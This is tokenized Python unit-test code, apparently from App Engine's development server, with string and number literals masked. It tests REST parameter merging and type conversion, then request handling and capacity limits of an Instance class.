assertEqual ( error . parameter_name , '<STR_LIT>' ) <EOL> def test_transform_rest_request_body_only ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { } <EOL> body_object = { '<STR_LIT>' : '<STR_LIT:body>' } <EOL> expected = { '<STR_LIT>' : '<STR_LIT:body>' } <EOL> self . 
_try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_body_only_any_old_value ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { } <EOL> body_object = { '<STR_LIT>' : { '<STR_LIT:body>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } } <EOL> expected = { '<STR_LIT>' : { '<STR_LIT:body>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] } } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_body_only_message_field ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { } <EOL> body_object = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:X>' } } <EOL> expected = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:X>' } } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_body_only_enum ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { } <EOL> enum_descriptor = { '<STR_LIT:X>' : { '<STR_LIT>' : '<STR_LIT:X>' } } <EOL> method_params = { '<STR_LIT>' : { '<STR_LIT>' : enum_descriptor } } <EOL> body_object = { '<STR_LIT>' : '<STR_LIT:X>' } <EOL> expected = { '<STR_LIT>' : '<STR_LIT:X>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> body_object = { '<STR_LIT>' : '<STR_LIT:Y>' } <EOL> expected = { '<STR_LIT>' : '<STR_LIT:Y>' } <EOL> self . 
_try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> def test_transform_rest_request_path_query_no_collision ( self ) : <EOL> path_parameters = { '<STR_LIT:a>' : '<STR_LIT:b>' } <EOL> query_parameters = { '<STR_LIT:c>' : [ '<STR_LIT:d>' ] } <EOL> body_object = { } <EOL> expected = { '<STR_LIT:a>' : '<STR_LIT:b>' , '<STR_LIT:c>' : '<STR_LIT:d>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_path_query_collision ( self ) : <EOL> path_parameters = { '<STR_LIT:a>' : '<STR_LIT:b>' } <EOL> query_parameters = { '<STR_LIT:a>' : [ '<STR_LIT:d>' ] } <EOL> body_object = { } <EOL> expected = { '<STR_LIT:a>' : '<STR_LIT:d>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_path_query_collision_in_repeated_param ( self ) : <EOL> path_parameters = { '<STR_LIT:a>' : '<STR_LIT:b>' } <EOL> query_parameters = { '<STR_LIT:a>' : [ '<STR_LIT:d>' , '<STR_LIT:c>' ] } <EOL> body_object = { } <EOL> expected = { '<STR_LIT:a>' : [ '<STR_LIT:d>' , '<STR_LIT:c>' , '<STR_LIT:b>' ] } <EOL> method_params = { '<STR_LIT:a>' : { '<STR_LIT>' : True } } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> def test_transform_rest_request_path_body_no_collision ( self ) : <EOL> path_parameters = { '<STR_LIT:a>' : '<STR_LIT:b>' } <EOL> query_parameters = { } <EOL> body_object = { '<STR_LIT:c>' : '<STR_LIT:d>' } <EOL> expected = { '<STR_LIT:a>' : '<STR_LIT:b>' , '<STR_LIT:c>' : '<STR_LIT:d>' } <EOL> self . 
_try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_path_body_collision ( self ) : <EOL> path_parameters = { '<STR_LIT:a>' : '<STR_LIT:b>' } <EOL> query_parameters = { } <EOL> body_object = { '<STR_LIT:a>' : '<STR_LIT:d>' } <EOL> expected = { '<STR_LIT:a>' : '<STR_LIT:d>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_path_body_collision_in_repeated_param ( self ) : <EOL> path_parameters = { '<STR_LIT:a>' : '<STR_LIT:b>' } <EOL> query_parameters = { } <EOL> body_object = { '<STR_LIT:a>' : [ '<STR_LIT:d>' ] } <EOL> expected = { '<STR_LIT:a>' : [ '<STR_LIT:d>' ] } <EOL> method_params = { '<STR_LIT:a>' : { '<STR_LIT>' : True } } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> def test_transform_rest_request_path_body_message_field_cooperative ( self ) : <EOL> path_parameters = { '<STR_LIT>' : '<STR_LIT:X>' } <EOL> query_parameters = { } <EOL> body_object = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:Y>' } } <EOL> expected = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:X>' , '<STR_LIT>' : '<STR_LIT:Y>' } } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_path_body_message_field_collision ( self ) : <EOL> path_parameters = { '<STR_LIT>' : '<STR_LIT:X>' } <EOL> query_parameters = { } <EOL> body_object = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:Y>' } } <EOL> expected = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:Y>' } } <EOL> self . 
_try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_query_body_no_collision ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { '<STR_LIT:a>' : [ '<STR_LIT:b>' ] } <EOL> body_object = { '<STR_LIT:c>' : '<STR_LIT:d>' } <EOL> expected = { '<STR_LIT:a>' : '<STR_LIT:b>' , '<STR_LIT:c>' : '<STR_LIT:d>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_query_body_collision ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { '<STR_LIT:a>' : [ '<STR_LIT:b>' ] } <EOL> body_object = { '<STR_LIT:a>' : '<STR_LIT:d>' } <EOL> expected = { '<STR_LIT:a>' : '<STR_LIT:d>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_query_body_collision_in_repeated_param ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { '<STR_LIT:a>' : [ '<STR_LIT:b>' ] } <EOL> body_object = { '<STR_LIT:a>' : [ '<STR_LIT:d>' ] } <EOL> expected = { '<STR_LIT:a>' : [ '<STR_LIT:d>' ] } <EOL> method_params = { '<STR_LIT:a>' : { '<STR_LIT>' : True } } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> def test_transform_rest_request_query_body_message_field_cooperative ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { '<STR_LIT>' : [ '<STR_LIT:X>' ] } <EOL> body_object = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:Y>' } } <EOL> expected = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:X>' , '<STR_LIT>' : '<STR_LIT:Y>' } } <EOL> self . 
_try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_query_body_message_field_collision ( self ) : <EOL> path_parameters = { } <EOL> query_parameters = { '<STR_LIT>' : [ '<STR_LIT:X>' ] } <EOL> body_object = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:Y>' } } <EOL> expected = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:Y>' } } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_path_query_body_no_collision ( self ) : <EOL> path_parameters = { '<STR_LIT:a>' : '<STR_LIT:b>' } <EOL> query_parameters = { '<STR_LIT:c>' : [ '<STR_LIT:d>' ] } <EOL> body_object = { '<STR_LIT:e>' : '<STR_LIT:f>' } <EOL> expected = { '<STR_LIT:a>' : '<STR_LIT:b>' , '<STR_LIT:c>' : '<STR_LIT:d>' , '<STR_LIT:e>' : '<STR_LIT:f>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_path_query_body_collision ( self ) : <EOL> path_parameters = { '<STR_LIT:a>' : '<STR_LIT:b>' } <EOL> query_parameters = { '<STR_LIT:a>' : [ '<STR_LIT:d>' ] } <EOL> body_object = { '<STR_LIT:a>' : '<STR_LIT:f>' } <EOL> expected = { '<STR_LIT:a>' : '<STR_LIT:f>' } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected ) <EOL> def test_transform_rest_request_unknown_parameters ( self ) : <EOL> path_parameters = { '<STR_LIT:a>' : '<STR_LIT:b>' } <EOL> query_parameters = { '<STR_LIT:c>' : [ '<STR_LIT:d>' ] } <EOL> body_object = { '<STR_LIT:e>' : '<STR_LIT:f>' } <EOL> expected = { '<STR_LIT:a>' : '<STR_LIT:b>' , '<STR_LIT:c>' : '<STR_LIT:d>' , '<STR_LIT:e>' : '<STR_LIT:f>' } <EOL> method_params = { '<STR_LIT:X>' : { } , '<STR_LIT:Y>' : { } } <EOL> self . 
_try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> def test_type_conversions ( self ) : <EOL> """<STR_LIT>""" <EOL> path_parameters = { '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : '<STR_LIT:3>' , '<STR_LIT>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT:true>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> query_parameters = { '<STR_LIT>' : [ '<STR_LIT>' ] , '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> body_object = { '<STR_LIT>' : '<STR_LIT>' } <EOL> expected = { '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> method_params = { '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT:float>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } } <EOL> self . _try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , method_params ) <EOL> def test_invalid_conversions ( self ) : <EOL> """<STR_LIT>""" <EOL> for type_name in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:float>' , '<STR_LIT>' ) : <EOL> param_name = '<STR_LIT>' % type_name <EOL> path_parameters = { param_name : '<STR_LIT>' } <EOL> query_parameters = { } <EOL> body_object = { } <EOL> expected = { } <EOL> method_params = { param_name : { '<STR_LIT:type>' : type_name } } <EOL> try : <EOL> self . 
_try_transform_rest_request ( path_parameters , query_parameters , <EOL> body_object , expected , <EOL> method_params = method_params ) <EOL> self . fail ( '<STR_LIT>' % type_name ) <EOL> except errors . BasicTypeParameterError as error : <EOL> self . assertEqual ( error . parameter_name , param_name ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import time <EOL> import unittest <EOL> import google <EOL> import mox <EOL> from google . appengine . tools . devappserver2 import instance <EOL> from google . appengine . tools . devappserver2 import wsgi_request_info <EOL> class TestInstance ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . mox = mox . Mox ( ) <EOL> self . proxy = self . mox . CreateMock ( instance . RuntimeProxy ) <EOL> self . environ = object ( ) <EOL> self . start_response = object ( ) <EOL> self . url_map = object ( ) <EOL> self . match = object ( ) <EOL> self . request_id = object ( ) <EOL> self . response = [ object ( ) ] <EOL> self . request_data = self . mox . CreateMock ( wsgi_request_info . WSGIRequestInfo ) <EOL> def tearDown ( self ) : <EOL> self . mox . UnsetStubs ( ) <EOL> def test_new_instance ( self ) : <EOL> inst = instance . Instance ( <EOL> self . request_data , '<STR_LIT:name>' , self . proxy , max_concurrent_requests = <NUM_LIT:5> , <EOL> expect_ready_request = True ) <EOL> self . assertEqual ( <NUM_LIT:0> , inst . total_requests ) <EOL> self . assertEqual ( <NUM_LIT:5> , inst . remaining_request_capacity ) <EOL> self . assertEqual ( <NUM_LIT:0> , inst . num_outstanding_requests ) <EOL> self . assertFalse ( inst . can_accept_requests ) <EOL> self . assertTrue ( inst . handling_ready_request ) <EOL> self . assertAlmostEqual ( <NUM_LIT:0> , inst . idle_seconds , places = <NUM_LIT:2> ) <EOL> self . assertEqual ( <NUM_LIT:0> , inst . get_latency_60s ( ) ) <EOL> self . assertEqual ( <NUM_LIT:0> , inst . get_qps_60s ( ) ) <EOL> self . assertEqual ( '<STR_LIT:name>' , inst . instance_id ) <EOL> def test_handle ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . proxy . start ( ) <EOL> self . environ = { } <EOL> self . request_data . 
set_request_instance ( self . request_id , inst ) <EOL> self . proxy . handle ( self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . NORMAL_REQUEST ) . AndReturn ( self . response ) <EOL> inst . _condition . notify ( ) <EOL> self . mox . ReplayAll ( ) <EOL> now = time . time ( ) <EOL> inst . _request_history . append ( ( now - <NUM_LIT:100> , now - <NUM_LIT> ) ) <EOL> inst . start ( ) <EOL> self . assertTrue ( inst . can_accept_requests ) <EOL> self . assertEqual ( <EOL> self . response , <EOL> list ( inst . handle ( self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . NORMAL_REQUEST ) ) ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( inst . _request_history ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . total_requests ) <EOL> self . assertEqual ( <NUM_LIT:5> , inst . remaining_request_capacity ) <EOL> self . assertEqual ( <NUM_LIT:0> , inst . num_outstanding_requests ) <EOL> self . assertTrue ( <NUM_LIT:0> < inst . get_qps_60s ( ) ) <EOL> def test_handle_ready_request ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> , <EOL> expect_ready_request = True ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . proxy . start ( ) <EOL> self . environ = { } <EOL> self . request_data . set_request_instance ( self . request_id , inst ) <EOL> self . proxy . handle ( self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . READY_REQUEST ) . AndReturn ( self . response ) <EOL> inst . _condition . notify ( <NUM_LIT:5> ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> self . assertFalse ( inst . can_accept_requests ) <EOL> self . assertRaises ( instance . 
CannotAcceptRequests , <EOL> inst . handle , <EOL> self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . NORMAL_REQUEST ) <EOL> self . assertEqual ( <EOL> self . response , <EOL> list ( inst . handle ( self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . READY_REQUEST ) ) ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . total_requests ) <EOL> self . assertEqual ( <NUM_LIT:5> , inst . remaining_request_capacity ) <EOL> self . assertEqual ( <NUM_LIT:0> , inst . num_outstanding_requests ) <EOL> self . assertTrue ( <NUM_LIT:0> < inst . get_qps_60s ( ) ) <EOL> self . assertFalse ( inst . handling_ready_request ) <EOL> def test_handle_background_request ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> , <EOL> max_background_threads = <NUM_LIT:2> ) <EOL> inst . _num_running_background_threads = <NUM_LIT:1> <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . proxy . start ( ) <EOL> self . environ = { } <EOL> self . request_data . set_request_instance ( self . request_id , inst ) <EOL> self . proxy . handle ( self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . BACKGROUND_REQUEST ) . AndReturn ( self . response ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> self . assertTrue ( inst . can_accept_requests ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . remaining_background_thread_capacity ) <EOL> self . assertEqual ( <EOL> self . response , <EOL> list ( inst . handle ( self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . BACKGROUND_REQUEST ) ) ) <EOL> self . mox . 
VerifyAll ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . total_requests ) <EOL> self . assertEqual ( <NUM_LIT:5> , inst . remaining_request_capacity ) <EOL> self . assertEqual ( <NUM_LIT:0> , inst . num_outstanding_requests ) <EOL> self . assertTrue ( <NUM_LIT:0> < inst . get_qps_60s ( ) ) <EOL> self . assertEqual ( <NUM_LIT:2> , inst . remaining_background_thread_capacity ) <EOL> self . assertFalse ( inst . handling_ready_request ) <EOL> def test_handle_shutdown_request ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:1> ) <EOL> inst . _num_outstanding_requests = <NUM_LIT:0> <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . proxy . start ( ) <EOL> self . environ = { } <EOL> self . request_data . set_request_instance ( self . request_id , inst ) <EOL> self . proxy . handle ( self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . SHUTDOWN_REQUEST ) . AndReturn ( self . response ) <EOL> self . proxy . quit ( ) <EOL> inst . _condition . notify_all ( ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> self . assertTrue ( inst . can_accept_requests ) <EOL> self . assertFalse ( inst . has_quit ) <EOL> inst . quit ( expect_shutdown = True ) <EOL> self . assertFalse ( inst . can_accept_requests ) <EOL> self . assertTrue ( inst . has_quit ) <EOL> self . assertEqual ( <EOL> self . response , <EOL> list ( inst . handle ( self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . SHUTDOWN_REQUEST ) ) ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . total_requests ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . remaining_request_capacity ) <EOL> self . assertEqual ( <NUM_LIT:0> , inst . num_outstanding_requests ) <EOL> self . 
assertTrue ( <NUM_LIT:0> < inst . get_qps_60s ( ) ) <EOL> self . assertFalse ( inst . _quitting ) <EOL> self . assertTrue ( inst . _quit ) <EOL> def test_handle_shutdown_request_running_request ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:1> ) <EOL> inst . _num_outstanding_requests = <NUM_LIT:1> <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . proxy . start ( ) <EOL> self . environ = { } <EOL> self . request_data . set_request_instance ( self . request_id , inst ) <EOL> self . proxy . handle ( self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . SHUTDOWN_REQUEST ) . AndReturn ( self . response ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> self . assertTrue ( inst . can_accept_requests ) <EOL> self . assertFalse ( inst . has_quit ) <EOL> inst . quit ( expect_shutdown = True ) <EOL> self . assertFalse ( inst . can_accept_requests ) <EOL> self . assertTrue ( inst . has_quit ) <EOL> self . assertEqual ( <EOL> self . response , <EOL> list ( inst . handle ( self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . SHUTDOWN_REQUEST ) ) ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . total_requests ) <EOL> self . assertEqual ( <NUM_LIT:0> , inst . remaining_request_capacity ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . num_outstanding_requests ) <EOL> self . assertEqual ( <NUM_LIT:0> , inst . idle_seconds ) <EOL> self . assertTrue ( <NUM_LIT:0> < inst . get_qps_60s ( ) ) <EOL> self . assertTrue ( inst . _quitting ) <EOL> self . assertFalse ( inst . _quit ) <EOL> def test_handle_before_start ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . 
proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . assertRaises ( instance . CannotAcceptRequests , <EOL> inst . handle , <EOL> self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . NORMAL_REQUEST ) <EOL> def test_handle_after_quit ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . proxy . start ( ) <EOL> self . proxy . quit ( ) <EOL> inst . _condition . notify_all ( ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> inst . quit ( ) <EOL> self . assertRaises ( instance . CannotAcceptRequests , <EOL> inst . handle , <EOL> self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . NORMAL_REQUEST ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_handle_while_quitting ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> inst . _num_outstanding_requests = <NUM_LIT:1> <EOL> self . proxy . start ( ) <EOL> self . mox . ReplayAll ( ) <EOL> inst . start ( ) <EOL> inst . quit ( allow_async = True ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertRaises ( instance . CannotAcceptRequests , <EOL> inst . handle , <EOL> self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . NORMAL_REQUEST ) <EOL> def test_handle_no_capacity ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . 
proxy , <EOL> max_concurrent_requests = <NUM_LIT:1> ) <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> inst . _num_outstanding_requests = <NUM_LIT:1> <EOL> self . proxy . start ( ) <EOL> self . assertRaises ( instance . CannotAcceptRequests , <EOL> inst . handle , <EOL> self . environ , <EOL> self . start_response , <EOL> self . url_map , <EOL> self . match , <EOL> self . request_id , <EOL> instance . NORMAL_REQUEST ) <EOL> def test_reserve_background_thread_success ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> , <EOL> max_background_threads = <NUM_LIT:2> ) <EOL> inst . _started = True <EOL> self . mox . ReplayAll ( ) <EOL> self . assertEqual ( <NUM_LIT:2> , inst . remaining_background_thread_capacity ) <EOL> inst . reserve_background_thread ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . remaining_background_thread_capacity ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_reserve_background_thread_quitting ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> , <EOL> max_background_threads = <NUM_LIT:2> ) <EOL> inst . _started = True <EOL> inst . _quitting = True <EOL> self . mox . ReplayAll ( ) <EOL> self . assertEqual ( <NUM_LIT:2> , inst . remaining_background_thread_capacity ) <EOL> inst . reserve_background_thread ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . remaining_background_thread_capacity ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_reserve_background_thread_no_capacity ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> , <EOL> max_background_threads = <NUM_LIT:0> ) <EOL> inst . _started = True <EOL> self . mox . ReplayAll ( ) <EOL> self . assertEqual ( <NUM_LIT:0> , inst . remaining_background_thread_capacity ) <EOL> self . 
assertRaises ( instance . CannotAcceptRequests , <EOL> inst . reserve_background_thread ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertEqual ( <NUM_LIT:0> , inst . remaining_background_thread_capacity ) <EOL> def test_reserve_background_thread_not_started ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> , <EOL> max_background_threads = <NUM_LIT:1> ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . remaining_background_thread_capacity ) <EOL> self . assertRaises ( instance . CannotAcceptRequests , <EOL> inst . reserve_background_thread ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . remaining_background_thread_capacity ) <EOL> def test_reserve_background_thread_quit ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> , <EOL> max_background_threads = <NUM_LIT:1> ) <EOL> inst . _started = True <EOL> inst . _quit = True <EOL> self . mox . ReplayAll ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . remaining_background_thread_capacity ) <EOL> self . assertRaises ( instance . CannotAcceptRequests , <EOL> inst . reserve_background_thread ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . remaining_background_thread_capacity ) <EOL> def test_reserve_background_thread_not_ready ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:5> , <EOL> max_background_threads = <NUM_LIT:2> , <EOL> expect_ready_request = True ) <EOL> inst . _started = True <EOL> self . mox . ReplayAll ( ) <EOL> self . assertEqual ( <NUM_LIT:2> , inst . remaining_background_thread_capacity ) <EOL> inst . reserve_background_thread ( ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , inst . 
remaining_background_thread_capacity ) <EOL> def test_wait_with_capacity ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:1> ) <EOL> inst . _started = True <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . mox . stubs . Set ( time , '<STR_LIT:time>' , lambda : <NUM_LIT:0> ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertTrue ( inst . wait ( <NUM_LIT:1> ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_wait_waiting_for_can_accept ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:1> , <EOL> expect_ready_request = True ) <EOL> inst . _started = True <EOL> self . mox . StubOutWithMock ( inst . _condition , '<STR_LIT>' ) <EOL> self . time = <NUM_LIT:0> <EOL> self . mox . stubs . Set ( time , '<STR_LIT:time>' , lambda : self . time ) <EOL> def advance_time ( * unused_args ) : <EOL> self . time += <NUM_LIT:10> <EOL> inst . _condition . wait ( <NUM_LIT:1> ) . WithSideEffects ( advance_time ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertFalse ( inst . wait ( <NUM_LIT:1> ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_wait_timed_out_with_capacity ( self ) : <EOL> inst = instance . Instance ( self . request_data , '<STR_LIT:name>' , self . proxy , <EOL> max_concurrent_requests = <NUM_LIT:1> ) <EOL> inst . _started = True <EOL> self . mox . StubOutWithMock ( inst . 